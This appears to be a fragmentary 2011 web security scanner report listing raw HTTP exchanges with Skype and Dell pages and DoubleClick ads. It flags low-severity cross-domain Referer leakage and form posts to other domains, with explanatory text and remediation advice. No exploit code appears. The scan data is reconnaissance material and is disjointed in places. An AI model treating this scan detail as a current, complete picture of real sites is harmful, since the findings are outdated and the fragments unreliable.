HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:20 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 50254 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /zh-Hant/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:20 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 60218 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-Hant" lang="zh-Hant">
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
The response contains the following link to another domain:
http://www.ideastorm.com/
Request
GET /sna/DellPartsFamily.aspx?=us&cs=04&l=en&s=bsd&~topic=sna_parts_supplies&~ck=mn&category_id=7566&redirect=1&~ck=mn HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 67566 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:06 GMT; path=/ Set-Cookie: StormSCookie=bandwidth=NA&js=1&flashversion=10; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:05 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell C ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.ideastorm.com/
Request
GET /sna/ShopAllBrands.aspx?c=us&l=en&cs=04 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 166411 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:28 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:28 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Shop B ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.ideastorm.com/
Request
GET /sna/batteryconfig.aspx?c=us&l=en&s=bsd&cs=04 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 23838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:19 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:19 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Batter ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
GET /sna/category.aspx?c=us&category_id=4014&cs=04&l=en&navla=26973~0~251106&nf=26973~0~251106&s=bsd HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 129649 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:14 GMT; path=/ Set-Cookie: StormSCookie=bandwidth=NA&js=1&flashversion=10; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:14 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Printe ...[SNIP]... <noscript> <img src="http://ad.doubleclick.net/activity;src=1305124;type=smbej903;cat=print870;ord=0123456789?" width="1" height="1" border="0" alt=""> </noscript> ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
GET /sna/default.aspx?c=us&l=en&cs=04 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 88780 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:31 GMT; path=/ Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=320-2676,320-9511,320-1748,320-9321; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:31 GMT; path=/ Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:30 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Comput ...[SNIP]... <noscript> <img src="http://ad.doubleclick.net/activity;src=1305124;type=smbej903;cat=enaho928;ord=0123456789?" width="1" height="1" border="0" alt=""> </noscript> ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.ideastorm.com/
Request
GET /sna/memconfig.aspx?c=us&l=en&cs=04 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 31314 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:59 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:59 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Comput ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.ideastorm.com/
Request
GET /sna/printersupplies.aspx?c=us&cs=04&l=en&s=bsd&seg=bsd&step=4 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 34516 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:21 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:20 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Printe ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.ideastorm.com/
Request
GET /sna/sna.aspx?c=us&cs=04&l=en&s=bsd&~topic=printer_shopall_colorlasers_single_function HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62202 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:23 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:23 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Shop a ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sun, 04 Sep 2011 16:17:10 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html; charset=ISO-8859-1 X-Content-Type-Options: nosniff Server: cafe Content-Length: 8146 X-XSS-Protection: 1; mode=block
<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Jul 19 11:02:06 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... ww.wallstreetoasis.com/forums/houlihan-lokey-exit-opps/pubclick//Martini/hertz_goldplusrewar_080111_387/pos/Right/page/wallstreetoasis.com/ROS/L23/ord/1747216000%3Fhttp://www.hertzgoldplusrewards.com"><img src="http://s0.2mdn.net/1868452/1-Hertz_GoldPlusAd_Chrysler_160x600_StaticBackup.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a> ...[SNIP]...
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b79/0/0/%2a/h;245605273;0-0;0;65085238;1-468/60;43346931/43364718/1;;~sscs=%3fhttp://www.ironspeed.com/AspAllianceHome.aspx"><img src="http://s0.2mdn.net/viewad/3229814/IronSpeed_468x60.gif" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<img class="" title="Contains a hyperlink" alt="Message contains a hyperlink" id="display_49" src="http://skypec.i.lithium.com/skins/images/7D583AE19CE6D8C6CC84B9FA3A1F76F9/base/images/message_has_url.png"/> <img class="" title="Contains an image" alt="Message contains an image" id="display_50" src="http://skypec.i.lithium.com/skins/images/C3D20F2A59CAAA47A2D42860BB95C6C1/base/images/message_has_image.png"/>
</div> ...[SNIP]... <div class="LithiumLogo lia-component-common-widget-lithium-logo" class="LithiumLogo"> <a class="lia-link-navigation" title="Social CRM & Community Solutions Powered by Lithium" target="_blank" id="lithiumLogoLink" href="http://www.lithium.com/"><img class="" title="Social CRM & Community Solutions Powered by Lithium" alt="Powered by Lithium" id="display_51" src="http://skypec.i.lithium.com/skins/images/7CE6893D65E55F411F0162C285E0145B/base/images/button_lithium_logo.png"/></a> ...[SNIP]... </a>
GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>